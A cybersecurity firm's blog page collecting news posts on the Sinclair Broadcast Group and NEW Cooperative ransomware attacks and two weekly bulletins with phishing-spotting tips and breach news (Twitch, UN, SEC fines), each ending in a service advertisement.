    Tristan Boheim
    Marketing Manager
    1-484-294-1331
    press@netizen.net

  • Sinclair Broadcast Group Ransomware Attack: How it happened and what this means.

    Sinclair Broadcast Group Ransomware Attack: How it happened and what this means.

    Last week, millions of television viewers were shocked when a nationwide shutdown occurred, targeting local television stations owned by Sinclair Broadcast Group. Sinclair is one of the largest telecommunications conglomerates in the country, owning 294 stations and covering 100 different markets, giving them about 40% coverage of all American households. Sinclair acknowledged the breach last Monday in a statement saying:

    “On October 16, 2021, the company identified and began to investigate and take steps to contain a potential security incident. On October 17, 2021, the company identified that certain servers and workstations in its environment were encrypted with ransomware, and that certain office and operational networks were disrupted.”

    Shortly after this breach, Sinclair disclosed the full extent of the attack to the SEC. They highlighted that the ransomware disrupted its general and office operations, with nationwide outages and data exfiltration also occurring. Luckily, the company’s response has been swift, implementing their incident-response plan within minutes of being alerted to the breach.

    How did we get here?

    October has proven to be one of the busiest months for ransomware gangs with major breaches occurring at Twitch and Ferrara Candy just weeks ago. Researchers believe that Sinclair was targeted in this instance due to its reliance on local advertiser revenue. These advertisers promote their products in smaller markets across the country and cannot afford to waste their ad-spend on weeklong outages. By taking away these revenue streams, the threat actors have pushed Sinclair into a corner where they either have to pay the ransom to get operations back online or risk losing more of their advertisers’ investments. 

    What does this mean?

    Following the attack, many of Sinclair’s affiliate stations resumed operations in the middle of the week, with only a handful of minor inconveniences still lingering. Investigators have found that all stations were interconnected by a central Sinclair Active Directory, allowing the attackers to pivot from station to station within the network essentially.

    Another issue that may prove troublesome later on is the extent of the data that was taken. Sinclair disclosed that data exfiltration did occur during the breach but has yet to identify what information was stolen. Other security experts’ issues surround the entry point these attackers used to gain access to Sinclair’s systems. This foothold could be used for reentry and other attacks if Sinclair does not properly remediate all known vulnerabilities in their network.

    What is the solution?

    Ironically, this increase in breaches nationwide falls during Cybersecurity Awareness Month, but organizations have to prioritize security initiatives moving forward. If enterprise-grade companies like Sinclair can be breached, think of the damage that can be caused to smaller organizations with less funding towards security. MFA (multi-factor authentication) and manual password resets are a great place to start but are not the end-all of security problems. More thought needs to be given towards the segmentation and mapping of an organization’s network. Lower-tiered users should not have access that can be exploited to open multiple doors inside of a network. This focus on identity/privilege management needs to be brought to the top of security discussions moving forward.

    How Can Netizen Help?

    Netizen ensures that security gets built-in and not bolted-on. Providing advanced solutions to protect critical IT infrastructure such as the popular “CISO-as-a-Service” wherein companies can leverage the expertise of executive-level cybersecurity professionals without having to bear the cost of employing them full time. 

    We also offer compliance support, vulnerability assessments, penetration testing, and more security-related services for businesses of any size and type. 

    Additionally, Netizen offers an automated and affordable assessment tool that continuously scans systems, websites, applications, and networks to uncover issues. Vulnerability data is then securely analyzed and presented through an easy-to-interpret dashboard to yield actionable risk and compliance information for audiences ranging from IT professionals to executive managers.

    Netizen is an ISO 27001:2013 (Information Security Management), ISO 9001:2015, and CMMI V 2.0 Level 3 certified company. We are a proud Service-Disabled Veteran-Owned Small Business that is recognized by the U.S. Department of Labor for hiring and retention of military veterans. 

    Questions or concerns? Feel free to reach out to us any time – https://www.netizen.net/contact

  • Netizen Cybersecurity Bulletin (October 11th, 2021)

    Overview

    • Phish Tale of the Week
    • Twitch reports data breach of over 128 GB
    • Google announces new two step verification initiative
    • How can Netizen help?

    Phish Tale of the Week

    Phishing attempts can often target specific groups that can be exploited by malicious actors. In this instance, we see a phishing scam targeting unsuspecting employees that may be expecting an invoice to be paid or just someone who doesn’t check their email rigorously. This email appears to be a notification saying we have won $750 on Cash App. This email contains Cash App’s branding and a convincing message saying my $750 reward expires soon? Unfortunately, there’s plenty or reasons not to click that email right away.

    Take a look below:

    1. The first red flag on this email is the sender address. Always thoroughly inspect the sender address to ensure its from a trusted sender. In the future, check all suspicious emails from companies against previous correspondences you’ve received and make sure the sender address is the same.
    2. The second warning sign in this email is the inconsistent messaging. The image in the email shows that I can win $750, however the message says I have already won the money. Look for consistency throughout emails with companies. Most companies will also provide a lengthy terms and conditions section for prizes and competitions.
    3. The final warning sign for this email is the callouts at the bottom. This message says that my reward is expiring soon although this is the first notice we’ve received about this payment. An easy way to spot a scam email is to reference previous emails you’ve received from the company. When compared to other correspondences from Cash App, this email immediately looks different.


    General Recommendations:

    A phishing email will typically direct the user to click on a link where they will then be prompted to update personal information, such as a password, credit card, social security, or bank account information. A legitimate company already has this sensitive information and would not ask for it again, especially via email. 

    • Scrutinize your emails before clicking anything. Have you ordered anything recently? Does this order number match the one I already have? Did the email come from a store you don’t usually order supplies from or a service you don’t use? If so, it’s probably a phishing attempt.
    • Verify that the sender is actually from the company sending the message.
    • Did you receive a message or email from someone you don’t recognize? Are they asking you to sign into a website to give Personally Identifiable Information (PII) such as credit card numbers, social security number, etc. A legitimate company will never ask for PII via instant message or email.
    • Do not give out personal or company information over the internet.
    • Do not click on unrecognized links or attachments. If you do proceed, verify that the URL is the correct one for the company/service and it has the proper security in place, such as HTTPS.

    Many phishing emails pose a sense of urgency or even aggressiveness to prompt a form of intimidation. Any email requesting immediate action should be vetted thoroughly to determine whether or not it is a scam. Also, beware of messages that seek to tempt users into opening an attachment or visiting a link. For example, an attachment titled “Fix your account now” may draw the question “What is wrong with my account?” and prompt you to click a suspicious link.

    For Cash App specific recommendations and tips check out this link to their fraud detection center here.

    Cybersecurity Brief

    In this week’s Cybersecurity Brief:

    Twitch reports data breach of over 128 GB.

    Last week, an unknown actor released the entirety of video streaming company Twitch’s source code in an over 128 GB heap of data. Video Games Chronicle initially broke the story on Wednesday with reports that an anonymous hacker gained access to a large amount of Twitch’s private data containing user payout information and Twitch’s source code among the stolen data. The hacker posted a torrent link to the trove of data on 4chan, citing the intent to “foster more disruption and competition in the online video streaming space” and that “their community is a disgusting toxic cesspool” as reasons for the leak.

    “Jeff Besos paid $970 million for this, we’re giving it away FOR FREE. #DoBetterTwitch,” the hacker added.

    Representatives from Twitch were quick to confirm the breach giving this response to the press. “We can confirm a breach has taken place. Our teams are working with urgency to understand the extent of this. We will update the community as soon as additional information is available. Thank you for bearing with us.”

    Analysts everywhere have begun to sift through the leaked data, finding everything from encrypted passwords to financial payouts to some of Twitch’s top streamers. Twitch account holders are recommended to change their passwords and enable two-factor authentication in the meantime to deter any unauthorized sign-ons. This breach comes after a large portion of Twitch’s community took to social media with the #DoBetterTwitch campaign seeking a more inclusive and tolerant community.

    To read more about this article, click here.

    Google announces new two-step verification initiative.

    Recently, Google announced plans to automatically sign up almost 150 million users into their new two-factor authentication program by the end of the year. This effort is part of Google’s ongoing initiatives to prevent unauthorized access to user accounts and increase organizational security. Google will also test this program with over 2 million Youtube creators, enabling the two-step verification (2SV) setting to better protect their channels from potential breaches.

    One of Google’s product managers AbdelKarim Mardini, and director of account security and safety, Guemmy Kim, had this to add “2SV is strongest when it combines both something you know (like a password) and something you have (like your phone or a security key)”. This rollout follows announcements made by Google in May where the company detailed the desire for a simpler and safer future. You may not realize it, but passwords are the most significant threat to security. They are easily stolen, and many users often use duplicate passwords for multiple sites, allowing one key to unlock limitless doors. Experts believe that as more companies push towards multifactor authentication, security will increase overall, reducing the number of data breaches and unauthorized account sign-ons.

    Google also announced plans to add a feature into its Google search app to allow users to access all of their saved passwords from Password Manager right from the opening menu. This focus on passwords and security by Google follows developments from Microsoft earlier this week detailing a new passwordless way to access user accounts.      

    For more information check out the rest of the article here.

    How Can Netizen Help?

    Netizen ensures that security gets built-in and not bolted-on. Providing advanced solutions to protect critical IT infrastructure such as the popular “CISO-as-a-Service” wherein companies can leverage the expertise of executive-level cybersecurity professionals without having to bear the cost of employing them full time. 

    We also offer compliance support, vulnerability assessments, penetration testing, and more security-related services for businesses of any size and type. 

    Additionally, Netizen offers an automated and affordable assessment tool that continuously scans systems, websites, applications, and networks to uncover issues. Vulnerability data is then securely analyzed and presented through an easy-to-interpret dashboard to yield actionable risk and compliance information for audiences ranging from IT professionals to executive managers.

    Netizen is a CMMI V2.0 Level 3, ISO 9001:2015, and ISO 27001:2013 (Information Security Management) certified company. We are a proud Service-Disabled Veteran-Owned Small Business that is recognized by the U.S. Department of Labor for hiring and retention of military veterans. 

  • NEW Cooperative Ransomware Attack: How it happened and what this means.

    NEW Cooperative Ransomware Attack: How it happened and what this means.

    Over the weekend, NEW Cooperative Inc., a Fort Dodge, Iowa-based agricultural services firm was crippled by a ransomware attack. The outside threat group BlackMatter has stated that they are responsible for this attack and have demanded a ransom of $5.9 million to release the data they have locked. BlacMatter released additional information detailing that the ransom will double to $11.8 million if not paid within five days.

    Reports from inside NEW Cooperative state that as soon as they noticed the attack, they immediately shut all systems offline to stifle the spread of the ransomware. A spokesperson from NEW had this to add “NEW Cooperative recently identified a cybersecurity incident that is impacting some of our company’s devices and systems. Out of an abundance of caution, we have proactively taken our systems offline to contain the threat, and we can confirm it has been successfully contained.”.

    This spokesperson later says that they have notified law enforcement and are working with CISA and data security experts to remediate this issue.

    How did we get here?

    Ransomware gangs have continued to put pressure on critical infrastructure around the world. They see these companies as very lucrative targets, given the public’s reliance on many of their outputs or products. What’s interesting about this case is BlackMatter has previously stated that they will not target critical infrastructure facilities. Screenshots of the ransomware negotiation between BlackMatter and NEW show the cooperative asking why they were targeted, given they are crucial to the nation’s food supply. BlackMatter replied proclaiming “You do not fall under the rules, everyone will only incur losses, everything is tied to the commerce, the critical ones mean the vital needs of a person, and you earn money.”

    BlackMatter then attempts to further persuade NEW Cooperative into paying the ransom, citing that “Since everything is so serious with you, let’s come to an agreement quickly and solve everything quickly.”.  

    What does this mean?

    This attack brings into question the blurry lines some cybercriminal gangs operate along. If a company with direct ties to the United States’ food supply chain is not considered critical infrastructure, what is? NEW Cooperative later stressed to BlackMatter that the impact of this attack would be more significant than Colonial Pipeline. With their systems offline, they will have no way to process orders or direct distribution of feed and grain vital to farmers across the country.

    NEW Cooperative has passed on a directive to all of their customers, assuring them that they will still get the feed needed to feed their animals while NEW’s systems are down. Farmers in Iowa reported that although the farming industry has adapted to many technological advances, this attack has forced them to use old school methods like paper tickets to measure the weight of a truck and the moisture in the grain.

    What is the solution?

    While cybersecurity directives from The White House help bring awareness to ransomware attacks and cyber-crime, more has to be done. It is time for all organizations to talk about their security posture. These ransomware gangs have proven no company is off-limits when it comes to their targets and companies must defend themselves. The private and public sectors must test their disaster recovery plans immediately and review their ability to respond to cyber-attacks.

    How Can Netizen Help?

    Netizen ensures that security gets built-in and not bolted-on. Providing advanced solutions to protect critical IT infrastructure such as the popular “CISO-as-a-Service” wherein companies can leverage the expertise of executive-level cybersecurity professionals without having to bear the cost of employing them full time. 

    We also offer compliance support, vulnerability assessments, penetration testing, and more security-related services for businesses of any size and type. 

    Additionally, Netizen offers an automated and affordable assessment tool that continuously scans systems, websites, applications, and networks to uncover issues. Vulnerability data is then securely analyzed and presented through an easy-to-interpret dashboard to yield actionable risk and compliance information for audiences ranging from IT professionals to executive managers.

    Netizen is an ISO 27001:2013 (Information Security Management), ISO 9001:2015, and CMMI V 2.0 Level 3 certified company. We are a proud Service-Disabled Veteran-Owned Small Business that is recognized by the U.S. Department of Labor for hiring and retention of military veterans. 

    Questions or concerns? Feel free to reach out to us any time – https://www.netizen.net/contact

  • Netizen Cybersecurity Bulletin (September 14th, 2021)

    Netizen Cybersecurity Bulletin (September 14th, 2021)

    Overview

    • Phish Tale of the Week
    • Hackers target United Nations in latest data breach
    • U.S SEC changes stance on Cybersecurity. What does this mean for your business?
    • How can Netizen help?

    Phish Tale of the Week

    Phishing attempts can often target specific groups that can be exploited by malicious actors. In this instance, we see a phishing scam targeting unsuspecting employees that may be expecting an invoice to be paid or just someone who doesn’t check their email rigorously. This email appears to be a survey request for Costco where the viewer could receive $50 for their participation. This email contains Costco’s branding and a convincing message saying the survey should only take 30 seconds, so why not click on the link and get our $50? Unfortunately, there’s plenty or reasons not to click that email right away.

    Take a look below:

    1. The first red flag on this email is the sender address. Always thoroughly inspect the sender address to ensure its from a trusted sender. In the future, check all suspicious emails from companies against previous correspondences you’ve received and make sure the sender address is the same.
    2. The second warning sign in this email is the inconsistent messaging. The subject line reads that “$50 could be yours today”, however there is no further mention of this incentive. Look for consistency throughout emails with companies. Most companies will also attach a terms and conditions statement regarding the incentive from the survey.
    3. The final warning sign for this email is the callouts at the bottom. Two addresses are referenced at the bottom of the email, neither of which belong to any Costco locations. An easy way to spot a scam email is to reference buildings or locations mentioned in the correspondence. When searched on maps, each of these locations turns up as empty addresses with no occupants.


    General Recommendations:

    A phishing email will typically direct the user to click on a link where they will then be prompted to update personal information, such as a password, credit card, social security, or bank account information. A legitimate company already has this sensitive information and would not ask for it again, especially via email. 

    • Scrutinize your emails before clicking anything. Have you ordered anything recently? Does this order number match the one I already have? Did the email come from a store you don’t usually order supplies from or a service you don’t use? If so, it’s probably a phishing attempt.
    • Verify that the sender is actually from the company sending the message.
    • Did you receive a message or email from someone you don’t recognize? Are they asking you to sign into a website to give Personally Identifiable Information (PII) such as credit card numbers, social security number, etc. A legitimate company will never ask for PII via instant message or email.
    • Do not give out personal or company information over the internet.
    • Do not click on unrecognized links or attachments. If you do proceed, verify that the URL is the correct one for the company/service and it has the proper security in place, such as HTTPS.

    Many phishing emails pose a sense of urgency or even aggressiveness to prompt a form of intimidation. Any email requesting immediate action should be vetted thoroughly to determine whether or not it is a scam. Also, beware of messages that seek to tempt users into opening an attachment or visiting a link. For example, an attachment titled “Fix your account now” may draw the question “What is wrong with my account?” and prompt you to click a suspicious link.

    For Costco specific recommendations and tips check out this link to their fraud detection center here.

    Cybersecurity Brief

    In this week’s Cybersecurity Brief:

    Hackers target United Nations in latest data breach

    Last week, Cybersecurity research firm Resecurity discovered that an outside hacker group had targeted the United Nation’s internal network. The breach first occurred on April 5th, 2021, with hostile activity finally concluding in their environment on August 7th. The primary purpose of this attack was intelligence gathering with threat actors making out with a trove of data that could be utilized to perform cyberattacks against other government organizations in the future.

    Experts in the industry have theorized that stolen login credentials from a U.N. employee were the initial attack vector the hackers used to gain access to the U.N.’s systems. Many believe that the credentials were sourced from a website on the dark web known for selling and distributing stolen credentials.

    When asked why the threat actors targeted the U.N, Resecurity CEO Gene Yoo had this to add “Organizations like the U.N are a high-value target for cyber espionage activity. The actor conducted the intrusion with the goal of compromising large numbers of users within the U.N. networking for further long-term intelligence gathering.”

    Reports from this incident vary on the scale of the attack. On the one hand, the U.N. claims that the attackers were doing nothing more than just taking screenshots of the compromised network. On the other hand, Resecurity believes that the attackers stole data during this incident, which may become catalysts for more attacks.  

    U.N. spokesman Farhan Haq reported that “This attack had been detected before we were notified by Resecurity, and corrective actions to mitigate the impact of the breach had already been planned and were being implemented.” Haq also noted that the United Nations had been frequently targeted by cyber-attacks before, which is not a new phenomenon to the organization.

    To read more about this article, click here.

    U.S SEC changes stance on Cybersecurity. What does this mean for your business?

    The United States Securities and Exchange Commission (SEC) has reevaluated what it deems a threat for companies. Starting this year, the SEC will now consider cyber vulnerabilities an enormous business risk. This news comes as the regulatory commission levied significant fines on two well-known companies for failure to disclose cybersecurity issues. British education company Pearson PLC agreed to pay $1,000,000 in settlement charges following reports it misled investors after a 2018 data breach saw millions of student records stolen from their database. On a more recent note, real estate company First American Financial settled $500,000 in damages after failing to disclose a vulnerability in their environment that compromised up to 800 million files, many of which including social security numbers and other PII.

    This shift in how the SEC punishes companies for cybersecurity malpractice could significantly affect how companies view cybersecurity threats and issues moving forward. Currently, businesses are required to disclose “risk factors” so public investors can better understand the company’s stock. These “risk factors” include operations, competitive, economic, and cybersecurity incidents. However, few companies have ever faced any real regulatory repercussions from the SEC after suffering a cyberattack.

    What baffles many is that current risk disclosure policies were based on The Securities and Exchange Act of 1934, written during a time when the internet was still over half a century away. While the agency amended the procedures to include significant cybersecurity-related risks and incidents in 2011, and further echoed that cybersecurity incidents pose a substantial threat to our capital markets in 2018, there is still more to be done.

    This report comes as defense contractors have begun the painstakingly slow process of adopting the Cybersecurity The fines passed down to Pearson PLC and First American Financial are watershed moments for how companies view cybersecurity. Before, organizations took a more relaxed approach to disclosing vulnerabilities and their overall cyber posture. Hopefully, the enforcement of these penalties will shine a light on the operational woes that cybersecurity incidents can create. Organizations must act with clarity and conciseness to combat the ever-changing cyber landscape. The time for action is now.       

    For more information check out the rest of the article here.

    How Can Netizen Help?

    Netizen ensures that security gets built-in and not bolted-on. Providing advanced solutions to protect critical IT infrastructure such as the popular “CISO-as-a-Service” wherein companies can leverage the expertise of executive-level cybersecurity professionals without having to bear the cost of employing them full time. 

    We also offer compliance support, vulnerability assessments, penetration testing, and more security-related services for businesses of any size and type. 

    Additionally, Netizen offers an automated and affordable assessment tool that continuously scans systems, websites, applications, and networks to uncover issues. Vulnerability data is then securely analyzed and presented through an easy-to-interpret dashboard to yield actionable risk and compliance information for audiences ranging from IT professionals to executive managers.

    Netizen is a CMMI V2.0 Level 3, ISO 9001:2015, and ISO 27001:2013 (Information Security Management) certified company. We are a proud Service-Disabled Veteran-Owned Small Business that is recognized by the U.S. Department of Labor for hiring and retention of military veterans.